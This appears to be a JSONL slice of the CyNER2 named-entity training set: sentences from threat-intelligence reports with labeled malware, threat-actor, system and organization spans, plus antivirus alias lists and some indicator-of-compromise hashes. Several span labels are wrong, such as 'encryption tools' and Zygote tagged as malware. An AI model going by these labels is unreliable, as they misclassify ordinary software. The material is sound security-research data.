{"text": "What is most interesting about this group's more recent activity however, is their focus on users of encryption tools, peaking this summer.", "spans": {"THREAT_ACTOR: group's": [[36, 43]], "MALWARE: encryption tools,": [[101, 118]]}, "info": {"id": "cyner2_train_002921", "source": "cyner2_train"}}
{"text": "Once the malware is installed on the victim's device, it opens a back door, collects a list of system-specific information, and sends it to the command and control C&C server to register the device and then get a unique identifier for the infected device.", "spans": {"MALWARE: malware": [[9, 16]], "SYSTEM: victim's device,": [[37, 53]], "MALWARE: back door,": [[65, 75]], "SYSTEM: the device": [[187, 197]], "SYSTEM: the infected device.": [[235, 255]]}, "info": {"id": "cyner2_train_002923", "source": "cyner2_train"}}
{"text": "We believe the use of the Retadup malware family is limited to a very small set of threat actors.", "spans": {"MALWARE: Retadup malware family": [[26, 48]], "THREAT_ACTOR: threat actors.": [[83, 97]]}, "info": {"id": "cyner2_train_002924", "source": "cyner2_train"}}
{"text": "On May 30th our honeypots captured the first attack to make use of this particular vulnerability, but the payload in this exploit had nothing in common with the Trojan-Crypt that was EternalBlue and WannaCry.", "spans": {"SYSTEM: honeypots": [[16, 25]], "VULNERABILITY: vulnerability,": [[83, 97]], "MALWARE: payload": [[106, 113]], "MALWARE: exploit": [[122, 129]], "MALWARE: Trojan-Crypt": [[161, 173]], "MALWARE: EternalBlue": [[183, 194]], "MALWARE: WannaCry.": [[199, 208]]}, "info": {"id": "cyner2_train_002925", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.Rogue.bjbo W32/Trojan.AMVM-7843 TR/Rogue.7932483 Trojan.Graftor.DBF88 Backdoor/Win32.Etso.R61020 Trojan.Win32.Webprefix Win32/Trojan.Multi.daf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002928", "source": "cyner2_train"}}
{"text": "The Carbanak team does not just blindly compromise large numbers of computers and try to milk the cow' as other actors do, instead they act like a mature APT-group.", "spans": {"THREAT_ACTOR: The Carbanak team": [[0, 17]], "SYSTEM: computers": [[68, 77]], "THREAT_ACTOR: actors": [[112, 118]], "THREAT_ACTOR: APT-group.": [[154, 164]]}, "info": {"id": "cyner2_train_002929", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9831 Bloodhound.Gampass.E Trojan.Win32.Patched.ox Trojan.Win32.PatchedDll.C BehavesLike.Win32.BadFile.cm Virus.Win32.Crypted Trojan/PSW.OnLineGames.ckdm Trojan/Win32.Patched.ox PWS:Win32/Cuepilini.A Trojan.Win32.Patched.ox Trojan.Win32.Patched.b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002930", "source": "cyner2_train"}}
{"text": "Based on VirusTotal uploads, malicious documents content, and known victims – other targeted organizations are located in Turkey, Qatar, Kuwait, United Arab Emirates, Saudi Arabia, and Lebanon.", "spans": {"ORGANIZATION: VirusTotal": [[9, 19]], "ORGANIZATION: victims": [[68, 75]], "ORGANIZATION: organizations": [[93, 106]]}, "info": {"id": "cyner2_train_002931", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Jorik.Crix!O Win32.Trojan.WisdomEyes.16070401.9500.9992 Trojan.Win32.Dwn.sbard Trojan.Win32.A.Inject.129544 Trojan.DownLoader5.50729 Win32.Malware Trojan/Lebag.auv TrojanDownloader:Win32/Beshades.A Trojan/Win32.Inject.R29920 BScope.Malware-Cryptor.4112 Trj/CI.A Trojan.DL.Injecter!F6PQPalmepA W32/Injecter.AA!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002933", "source": "cyner2_train"}}
{"text": "xDedic is a trading platform where cybercriminals can purchase any of over 70,000 hacked servers from all around the internet.", "spans": {"THREAT_ACTOR: xDedic": [[0, 6]], "THREAT_ACTOR: trading platform": [[12, 28]], "THREAT_ACTOR: cybercriminals": [[35, 49]], "SYSTEM: hacked servers": [[82, 96]]}, "info": {"id": "cyner2_train_002934", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9889 Trojan.Sniff BehavesLike.Win32.BadFile.mc PWS:Win32/Finsgra.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002935", "source": "cyner2_train"}}
{"text": "Unit 42 does not have detailed targeting information for all known Bookworm samples, but we are aware of attempted attacks on at least two branches of government in Thailand.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: Bookworm": [[67, 75]], "ORGANIZATION: government": [[151, 161]]}, "info": {"id": "cyner2_train_002936", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Elitespyz.A Backdoor/W32.EliteSpyz.1687552 Backdoor.Elitespyz Backdoor.Elitespyz.A Backdoor.Elitespyz.A W32/Risk.FRAF-2715 Backdoor.Trojan BKDR_ELITESPYZ.A Backdoor.Elitespyz.A Backdoor.Win32.EliteSpyz.4 Backdoor.Elitespyz.A Trojan.Win32.EliteSpyz.dgpj Backdoor.Win32.EliteSpyz.1687552 Backdoor.W32.EliteSpyz.4!c Backdoor.Elitespyz.A Backdoor.Win32.EliteSpyz.04 Backdoor.Elitespyz.A BackDoor.EliteSpyz.4 Backdoor.EliteSpyz.Win32.1 BKDR_ELITESPYZ.A Trojan.Win32.Elitespyz Backdoor/EliteSpyz.4 W32.Hack.Tool BDS/EliteSpyz.4 Trojan[Backdoor]/Win32.EliteSpyz Backdoor.Win32.EliteSpyz.4 Backdoor.EliteSpyz Win32/EliteSpyz.04 Win32.Backdoor.Elitespyz.Wrgi Backdoor.EliteSpyz!8lwaYNdDuBo W32/EliteSpy.A!tr.bdr Win32/Backdoor.Spy.754", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002938", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Uncrre TR/RedCap.wfhca Trojan.Win32.Z.Uncrre.3584 Trojan:Win32/Uncrre.A Trojan.Win32.Uncrre Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002939", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Ruskill.143360 Backdoor.Win32.Ruskill!O Worm.Ainslot.A Backdoor.Ruskill.Win32.42 Backdoor.W32.Ruskill.fi!c Backdoor/Ruskill.fi TROJ_DROPR.SMIO Worm.Win32.Ngrbot.dfk Trojan.Win32.StartPage.cjvsv Trojan.Win32.Menti.98304 TrojWare.Win32.Injector.GWW BackDoor.IRC.Bot.892 TROJ_DROPR.SMIO Trojan.Win32.Buzus Backdoor/Ruskill.da W32/Injector.HCR!tr Worm/Win32.Ngrbot Worm.Win32.Ngrbot.dfk Worm/Win32.AutoRun.R6237 Worm.Ngrbot Win32.Trojan.Inject.Auto Backdoor.Ruskill!/ah4op3yVOE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002940", "source": "cyner2_train"}}
{"text": "Since approximately September 2022, cyber criminals have compromised U.S. and international organizations with a Royal ransomware variant.", "spans": {"THREAT_ACTOR: cyber criminals": [[36, 51]], "ORGANIZATION: U.S.": [[69, 73]], "ORGANIZATION: international organizations": [[78, 105]], "MALWARE: Royal ransomware": [[113, 129]]}, "info": {"id": "cyner2_train_002941", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M.Dropper.H W97M.Dropper.CB W97M/Dropper.m Troj.Downloader.Msword!c W97M/Dropexe.A W97M.Dropper.H W97M.Dropper.H W97M.Dropper.H W97M.Dropper.H W97M/Dropper.m W97M/Dropexe.A HEUR/Macro.Dropper HEUR.VBA.Trojan.d W97M.Dropper.H macro.ole.encodedownload.f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002943", "source": "cyner2_train"}}
{"text": "It has outlived several competitors including Zeus, and SpyEye.", "spans": {"MALWARE: Zeus,": [[46, 51]], "MALWARE: SpyEye.": [[56, 63]]}, "info": {"id": "cyner2_train_002945", "source": "cyner2_train"}}
{"text": "Dyre employed the spambot Gophe to send thousands of randomized documents hashes and file names per spam campaign", "spans": {"MALWARE: Dyre": [[0, 4]], "MALWARE: spambot Gophe": [[18, 31]], "THREAT_ACTOR: spam campaign": [[100, 113]]}, "info": {"id": "cyner2_train_002946", "source": "cyner2_train"}}
{"text": "Throughout 2015 and 2016, Android banking Trojans were primarily distributed outside the Google Play Store by using SMSishing, phishing e-mails and rogue websites, often dropping APKs related to Adobe Flash Player.", "spans": {"MALWARE: Android banking Trojans": [[26, 49]], "SYSTEM: the Google Play Store": [[85, 106]], "SYSTEM: APKs": [[179, 183]], "SYSTEM: Adobe Flash Player.": [[195, 214]]}, "info": {"id": "cyner2_train_002947", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9935 TrojanDownloader:Win32/Leodon.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002948", "source": "cyner2_train"}}
{"text": "On June 14th, 2017, a new variant of ZXShell appears to have been uploaded from the Marmara region of Turkey.", "spans": {"MALWARE: variant": [[26, 33]], "MALWARE: ZXShell": [[37, 44]]}, "info": {"id": "cyner2_train_002949", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Razy.D3E075 Trojan.MSIL.Crypt.gbqy BehavesLike.Win32.Trojan.gc Trojan.MSIL.Crypt TR/Kryptik.psxte Backdoor:Win32/Dodiw.A Trojan.MSIL.Crypt.gbqy Trj/GdSda.A MSIL/Kryptik.MQQ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002951", "source": "cyner2_train"}}
{"text": "Tick also uses a range of hacktools to map the victim's network and attempt to escalate privileges further.", "spans": {"THREAT_ACTOR: Tick": [[0, 4]], "MALWARE: hacktools": [[26, 35]]}, "info": {"id": "cyner2_train_002952", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9993 Trojan.Win32.KrServ.rq Trojan.Win32.JackServn.exlgil Trojan.Win32.Z.Jackservn.306688 Trojan.DownLoader26.11701 Trojan.Win64.Jackservn TR/JackServn.sphdt Trojan.Downloader.184 Trojan.Win32.KrServ.rq Trj/CI.A W32/JackServn.K!tr Win32/Trojan.Downloader.369", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002953", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clodeb4.Trojan.8496 Trojan/W32.Scar.350208.E W32/Autorun.worm.bcd Worm.Autorun Trojan/Scar.dyfr W32/MalwareS.BDRB W32.Huanot Virut.A[gs] Win32/Huanot.A WORM_HUANOT.SMIA Trojan.Scar-846 Trojan.Win32.Scar.bvisc Trojan.Win32.A.Scar.350208 Trojan.Copyself.101 TR/Scar.ccwl WORM_HUANOT.SMIA W32/Autorun.worm.bcd Trojan/Scar.pkp Worm:Win32/Huanot.A Trojan/Win32.Scar W32/Risk.JTAZ-7050 Virus.Win32.Heur.l W32/Autorun.JXD PE:Malware.FakeFolder@CV!1.6AA9 Worm.Win32.Huanot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002954", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Virut.Cur1 W32/Manex.worm Trojan.Zusy.D62E9 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Dropper.BBXI Win.Trojan.Cosmu-1044 Trojan.Win32.Scar.ojal Trojan.Win32.AutoRun.cgsnz Worm.Win32.A.AutoRun.310273 W32.W.AutoRun.cikl!c Win32.HLLW.Autoruner.27598 Trojan.Cosmu.Win32.3832 W32/Manex.worm W32/Risk.SOOH-5229 Trojan/Cosmu.dxm Trojan/Win32.Cosmu Worm:Win32/Vestgo.A Trojan.Win32.Scar.ojal HEUR/Fakon.mwf Worm.AutoRun Win32.Trojan.Scar.Dxwy Trojan.Scar!/4mh5woJZa8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002956", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.CDB.C8b2 TrojanBanker.Banker.awoc Trojan.Win32.Banker.bdicvp W32/MalwareF.FQTI Infostealer.Bancos Trojan-Banker.Win32.Banker.awoc Trojan.PWS.Banker!/1rqiSjn+V4 TrojWare.Win32.Spy.Banker.awoc Trojan-Banker.Win32.Banker TR/Banker.Banker.awoc Trojan/Banker.Banker.kbj Trojan:Win32/Sawmabs.A W32/Risk.BGBM-2797 Trojan-GameThief.Magania Trj/Thed.E Win32/Spy.Delf.NZK Trojan-Banker.Win32.Banker W32/Banker.AWOC!tr PSW.Banker5.BFQR Trojan.Win32.Delf.amo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002959", "source": "cyner2_train"}}
{"text": "The attack against Anthem resulted in the largest known healthcare data breach to date, with 80 million patient records exposed.", "spans": {"ORGANIZATION: Anthem": [[19, 25]]}, "info": {"id": "cyner2_train_002961", "source": "cyner2_train"}}
{"text": "ITG08 also has gained initial access by targeting specific employees with LinkedIn and spear-phishing emails to deliver the More_eggs backdoor.", "spans": {"THREAT_ACTOR: ITG08": [[0, 5]], "ORGANIZATION: specific employees with LinkedIn": [[50, 82]], "MALWARE: the More_eggs backdoor.": [[120, 143]]}, "info": {"id": "cyner2_train_002962", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Constructor.Xploitzomshc.A Constructor/W32.XploitZomShc.253952 Hacktool.Zomshc Trojan/Constructor.XploitZomShc.a Trojan.Constructor.Xploitzomshc.A W32/TrojanX.GSC Construction.Kit Trojan.Constructor.Xploitzomshc.A Constructor.Win32.XploitZomShc.a Trojan.Constructor.Xploitzomshc.A Riskware.Win32.XploitZomShc.hrxx Constructor.XploitZomShc.253952 Constructor.W32.XploitZomShc.a!c Win32.Trojan.Xploitzomshc.Wqwm Trojan.Constructor.Xploitzomshc.A Trojan.Constructor.Xploitzomshc.A VirusConstructor.Shc Tool.XploitZomShc.Win32.1 BehavesLike.Win32.Dropper.dc Trojan.Constructor.Xploitzomshc W32/Trojan.KXHA-5736 Constructor.XploitZomShc.b W32.Hack.Tool KIT/XploitZomShc.A HackTool[Constructor]/Win32.XploitZomShc VTool.XploitZomShc.a.kcloud Constructor.Win32.XploitZomShc.a Trojan.Constructor.Xploitzomshc.A Constructor.XploitZomShc W32/XploitZomShc.A!tr Win32/Constructor.96c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002963", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9986 Trojan-Downloader.Win32.Hover2.n TrojWare.Win32.TrojanDownloader.Small.NZK Trojan.DownLoader.45214 Trojan-Downloader.Win32.Hover2.n Win32/TrojanDownloader.Small.NZK", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002964", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanSpy.MSIL.r3 Trojan.Dropper Troj.PSW.MSIL.NetPass Trojan/Clicker.nai TrojanSpy.KeyLogger!3foOCbTDOkQ Spyware.ADH MSIL/TrojanClicker.NAI Trojan.Msil-382 Trojan-Spy.MSIL.KeyLogger.bybj Trojan.Win32.NetPass.dcndda Msil.Trojan-spy.Keylogger.Lhxb Trojan.MulDrop1.48625 Trojan/PSW.MSIL.oy W32/Dx.SUK!tr Trojan[PSW]/MSIL.NetPass Trojan.MSIL.Krypt.1 Trojan/Win32.Infostealer TrojanClicker:MSIL/Lnkhit.A MSIL.TrojanClicker Virus.MSIL Trojan.MSIL.KeyLogger.bybj Win32/Trojan.bee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002965", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win.Trojan.Shell-426 Backdoor:Win32/Sensode.G Trj/GdSda.A Win32/Trojan.75c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002968", "source": "cyner2_train"}}
{"text": "The domain was registered on March 8th , 2013 : Registration Service Provided By : SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD. Domain Name : DLMDOCUMENTSEXCHANGE.COM Registration Date : 08-Mar-2013 Expiration Date : 08-Mar-2014 Status : LOCKED The domain registration data indicates the following owner : Registrant Contact Details : peng jia peng jia ( bdoufwke123010 @ gmail.com ) beijingshiahiidienquc.d beijingshi beijing,100000 CN Tel .", "spans": {"ORGANIZATION: SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD.": [[83, 146]]}, "info": {"id": "cyner2_train_002969", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Win32.Poison.C12016", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002971", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Payreen Trojan.Ransom.TechSupportScam Trojan.Win32.Payreen.evwzbn W32/Trojan.JXJF-8565 TR/Payreen.exevx SupportScam:MSIL/Payreen.A Trojan.TechSupportScam Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002972", "source": "cyner2_train"}}
{"text": "Python/Agent.F is a worm that spreads via removable media.", "spans": {"MALWARE: worm": [[20, 24]], "SYSTEM: removable media.": [[42, 58]]}, "info": {"id": "cyner2_train_002973", "source": "cyner2_train"}}
{"text": "This post intends to share the findings of the FortiGuard Lion Team on BlackMoon's prevalence and its latest code updates.", "spans": {"ORGANIZATION: FortiGuard Lion Team": [[47, 67]], "MALWARE: BlackMoon's": [[71, 82]]}, "info": {"id": "cyner2_train_002974", "source": "cyner2_train"}}
{"text": "The Trojan may download files from the following remote location: [http://]bit.ly/2k4[REMOVED]", "spans": {"MALWARE: Trojan": [[4, 10]]}, "info": {"id": "cyner2_train_002975", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit/W32.CVE-2014-4114.I JS.Swabfex.QZ Exploit.CVE-2014-4114.A Troj.W32.Autoit!c Trojan.PPDropper TROJ_CVE20144114.G Trojan.Win32.Autoit.ezc Trojan.Win32.Autoit.efjbnz PPT.S.Exploit.1116160 TROJ_CVE20144114.G Trojan[Exploit]/OLE.CVE-2014-6352 Win32.Trojan.Autoit.Dwsw Trojan.Win32.BitcoinMiner virus.exp.20144114", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002977", "source": "cyner2_train"}}
{"text": "Zygote is a daemon whose goal is to launch apps on Android, and injecting code into it allows the malware to intervene in any activity on the device.", "spans": {"MALWARE: Zygote": [[0, 6]], "SYSTEM: daemon": [[12, 18]], "SYSTEM: Android,": [[51, 59]], "MALWARE: malware": [[98, 105]], "SYSTEM: device.": [[142, 149]]}, "info": {"id": "cyner2_train_002983", "source": "cyner2_train"}}
{"text": "This came on Friday 12th May when it was bundled with ransomware called WanaCrypt0r and let loose.", "spans": {"MALWARE: ransomware": [[54, 64]], "MALWARE: WanaCrypt0r": [[72, 83]]}, "info": {"id": "cyner2_train_002985", "source": "cyner2_train"}}
{"text": "Proofpoint researchers conducted a historical analysis of samples related to this research and uncovered new malware variants and likely origins and methods of infection.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "MALWARE: malware": [[109, 116]]}, "info": {"id": "cyner2_train_002988", "source": "cyner2_train"}}
{"text": "Mitigations Stay protected from mobile malware by taking these precautions : Do not download apps from unfamiliar sites Only install apps from trusted sources Pay close attention to the permissions requested by apps Install a suitable mobile security app , such as SEP Mobile or Norton , to protect your device and data Keep your operating system up to date Make frequent backups of important data Indicators of Compromise ( IoCs ) Package names : anew.football.cup.world.com.worldcup com.coder.glancelove com.winkchat APK SHA2 : 166f3a863bb2b66bda9c76dccf9529d5237f6394721f46635b053870eb2fcc5a b45defca452a640b303288131eb64c485f442aae0682a3c56489d24d59439b47 d9601735d674a9e55546fde0bffde235bc5f2546504b31799d874e8c31d5b6e9 2ce54d93510126fca83031f9521e40cd8460ae564d3d927e17bd63fb4cb20edc 67b1a1e7b505ac510322b9d4f4fc1e8a569d6d644582b588faccfeeaa4922cb7 1664cb343ee830fa94725fed143b119f7e2351307ed0ce04724b23469b9002f2 Loaded DEX SHA2 : afaf446a337bf93301b1d72855ccdd76112595f6e4369d977bea6f9721edf37e Domain/IP : goldncup [ .", "spans": {}, "info": {"id": "cyner2_train_002990", "source": "cyner2_train"}}
{"text": "Within the past couple years there were several major incidents that cited the use of Windows backdoors being ported to Linux.", "spans": {"SYSTEM: Windows": [[86, 93]], "MALWARE: backdoors": [[94, 103]], "SYSTEM: Linux.": [[120, 126]]}, "info": {"id": "cyner2_train_002992", "source": "cyner2_train"}}
{"text": "Malware authors can sometimes be creative in order to manipulate their human targets on the one hand and to circumvent security products, too.", "spans": {}, "info": {"id": "cyner2_train_002993", "source": "cyner2_train"}}
{"text": "In regard to the attack lifecycle, development of tools occurs in the weaponization/staging phase that precedes the delivery phase, of which is typically the first opportunity we see the actors' activities as they interact directly with their target.", "spans": {}, "info": {"id": "cyner2_train_002995", "source": "cyner2_train"}}
{"text": "ThreatTrack Security Labs researchers have confirmed the credential-stealing Trojan Dyre is using a new dropper — and a valid digital certificate — to carry out its dirty work over HTTPS connections.", "spans": {"ORGANIZATION: ThreatTrack Security Labs": [[0, 25]], "MALWARE: Trojan Dyre": [[77, 88]], "MALWARE: dropper": [[104, 111]]}, "info": {"id": "cyner2_train_002996", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Adclicker.HB Trojan-Dropper/W32.Dapato.114688.C Trojan-Dropper.Win32.Dapato!O Trojan.Adclicker.HB Dropper.Dapato.Win32.9811 Trojan/Dropper.Dapato.axil Trojan.Adclicker.HB TROJ_WEVARM.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_WEVARM.SM Win.Trojan.Dapato-938 TrojanDropper.Dapato Trojan.Win32.Dapato.ctxtcy Trojan.DownLoader6.77 Trojan-Clicker.AXPC TrojanDropper.Dapato.fxa Win32.Troj.Dapato.kcloud TrojanDownloader:Win32/Obvod.K Trojan.Adclicker.HB Trojan.Adclicker.HB Dropper/Win32.Dapato.R27056 Trojan.Adclicker.HB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002997", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Damatak Trojan.Heur.JP.EEC131 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Poison.eqxekp Trojan.Chanitor.26 BehavesLike.Win32.Injector.km Backdoor:Win32/Damatak.A Backdoor.W32.Hupigon.kYZB Heur.Trojan.Hlux Trj/CI.A Win32.Trojan.Dlder.Tayr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002998", "source": "cyner2_train"}}
{"text": "The email was supposedly sent by the head of a US-based terrorist monitoring group.", "spans": {"ORGANIZATION: head": [[37, 41]], "ORGANIZATION: US-based terrorist monitoring group.": [[47, 83]]}, "info": {"id": "cyner2_train_002999", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BDS/Iroffer.1221.5 Backdoor.Iroffer.AM W32/Iroffer.BC Trojan.Ioffer Backdoor.Win32.Iroffer.1221 Backdoor.Iroffer.1.2.2.1 W32/Iroffer.AM@bd BackDoor.Iroffer.1221 Backdoor.Win32.Iroffer.1221 W32/Iroffer.AM@bd Backdoor.Iroffer.1221.4098 Backdoor:Win32/Iroffer.1_221 Backdoor.Iroffer.1221 Win32/Iroffer.1222 Backdoor.Win32.Iroffer.1221 BackDoor.Iroffer.AD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003001", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.LoadAdv.ABW Trojan.Downloader.LoadAdv.ABW Win32.Trojan.WisdomEyes.16070401.9500.9971 Trojan.Downloader.LoadAdv.ABW Trojan.Downloader.LoadAdv.ABW Trojan.Downloader.LoadAdv.ABW Trojan.Packed.359 Trojan:Win32/Piptea.E Email-Worm.Win32.Joleee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003002", "source": "cyner2_train"}}
{"text": "Pay-per-infection is an underground business model where criminals are paying other criminals to distribute their malware", "spans": {"MALWARE: Pay-per-infection": [[0, 17]], "THREAT_ACTOR: underground business": [[24, 44]], "THREAT_ACTOR: criminals": [[57, 66], [84, 93]], "MALWARE: malware": [[114, 121]]}, "info": {"id": "cyner2_train_003003", "source": "cyner2_train"}}
{"text": "A number of tools and previously unknown exploits were discovered in the trove of data posted online.", "spans": {"MALWARE: tools": [[12, 17]], "MALWARE: unknown exploits": [[33, 49]]}, "info": {"id": "cyner2_train_003004", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DesticosLTG.Trojan Worm.Delf.Win32.2144 Worm.Win32.Delf.aai Trojan.Win32.Delf.ejergb Win32.Worm.Delf.Pkqt Trojan.MulDrop6.34757 BehavesLike.Win32.Dropper.vc W32/Trojan.ZKLJ-7196 Worm.Delf.ah Trojan:Win32/Chamolyon.A Trojan.Zusy.D2E11A Worm.Win32.Delf.aai Worm.Delf!YSxowO1fm1s Trojan-Downloader.Win32.Banload Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003005", "source": "cyner2_train"}}
{"text": "Name MD5 Purpose msconf.exe 55fb01048b6287eadcbd9a0f86d21adf Main module , reverse shell network.exe f673bb1d519138ced7659484c0b66c5b Sending exfiltrated data system.exe d3baa45ed342fbc5a56d974d36d5f73f Surrounding sound recording by mic update.exe 395f9f87df728134b5e3c1ca4d48e9fa Keylogging wow.exe 16311b16fd48c1c87c6476a455093e7a Screenshot capturing skype_sync2.exe 6bcc3559d7405f25ea403317353d905f Skype call recording to MP3 All modules , except skype_sync2.exe , are written in Python and packed to binary files via the Py2exe tool .", "spans": {"SYSTEM: Skype": [[404, 409]], "SYSTEM: Python": [[486, 492]], "SYSTEM: Py2exe": [[528, 534]]}, "info": {"id": "cyner2_train_003006", "source": "cyner2_train"}}
{"text": "The loader ’ s anti-debugger code is based on the following three methods : The first call aims to destroy the debugger connection : NOTE : This call completely stops the execution of WinDbg and other debuggers The second call tries to detect the presence of a debugger : The final call tries to destroy the possibility of adding software breakpoint : Finally , if the loader is happy with all the checks done so far , based on the victim operating system ( 32 or 64-bit ) it proceeds to decrypt a set of fake bitmap resources ( stage 2 ) embedded in the executable and prepares the execution of a new layer of VM decoding .", "spans": {}, "info": {"id": "cyner2_train_003009", "source": "cyner2_train"}}
{"text": "Commodity Remote Access Trojans RATs -- which are designed, productized and sold to the casual and experienced hacker alike -- put powerful remote access capabilities into the hands of criminals.", "spans": {"MALWARE: Commodity Remote Access Trojans RATs": [[0, 36]], "THREAT_ACTOR: experienced hacker": [[99, 117]], "MALWARE: remote access": [[140, 153]], "THREAT_ACTOR: criminals.": [[185, 195]]}, "info": {"id": "cyner2_train_003010", "source": "cyner2_train"}}
{"text": "In advance of any official release, cybercriminals have already released their own Mario-related apps.", "spans": {"THREAT_ACTOR: cybercriminals": [[36, 50]], "MALWARE: own Mario-related apps.": [[79, 102]]}, "info": {"id": "cyner2_train_003014", "source": "cyner2_train"}}
{"text": "This implant was deployed in less than 10 machines only.", "spans": {"MALWARE: implant": [[5, 12]], "SYSTEM: 10 machines": [[39, 50]]}, "info": {"id": "cyner2_train_003015", "source": "cyner2_train"}}
{"text": "This campaign started on July 9, a few days after the Hacking Team announced it was hacked.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "ORGANIZATION: Hacking Team": [[54, 66]]}, "info": {"id": "cyner2_train_003016", "source": "cyner2_train"}}
{"text": "Most of the organizations attacked were vendors of industrial automation solutions and system support contractors.", "spans": {"ORGANIZATION: organizations": [[12, 25]], "ORGANIZATION: vendors": [[40, 47]], "ORGANIZATION: industrial automation solutions": [[51, 82]], "ORGANIZATION: system support contractors.": [[87, 114]]}, "info": {"id": "cyner2_train_003017", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.18432.Y Trojan-PSW.Win32.Maran!O Trojan/PSW.Maran.ij W32/Pws.QZP Infostealer.Phax TSPY_MARAN.ANC Trojan-PSW.Win32.Maran.sv Trojan.Win32.Maran.jzdr Trojan.Win32.Z.Maran.18432.A Troj.GameThief.W32.OnLineGames.l9d5 TrojWare.Win32.PSW.Maran.NAH Trojan.PWS.Maran.591 Trojan.Win32.6BC1FBA9 TSPY_MARAN.ANC BehavesLike.Win32.SpywareLyndra.lh Trojan/PSW.Maran.ej Trojan[PSW]/Win32.Maran Trojan.Graftor.D18418 Trojan-PSW.Win32.Maran.sv PWS:Win32/Maran.M Trojan/Win32.Magania.C87823 TrojanPSW.Maran Trj/Maran.BK Win32/PSW.Maran.NAH Trojan.PWS.Maran!SDdAAxRuS44 Trojan-GameThief.Win32.OnLineGames W32/MARAN.SV!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003018", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Win-Trojan/MSILKrypt02.Exp Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003020", "source": "cyner2_train"}}
{"text": "Sakula is a well known malware variant linked to several significant targeted intrusion campaigns over the past 2-3 years.", "spans": {"MALWARE: Sakula": [[0, 6]], "MALWARE: malware": [[23, 30]], "THREAT_ACTOR: targeted intrusion campaigns": [[69, 97]]}, "info": {"id": "cyner2_train_003021", "source": "cyner2_train"}}
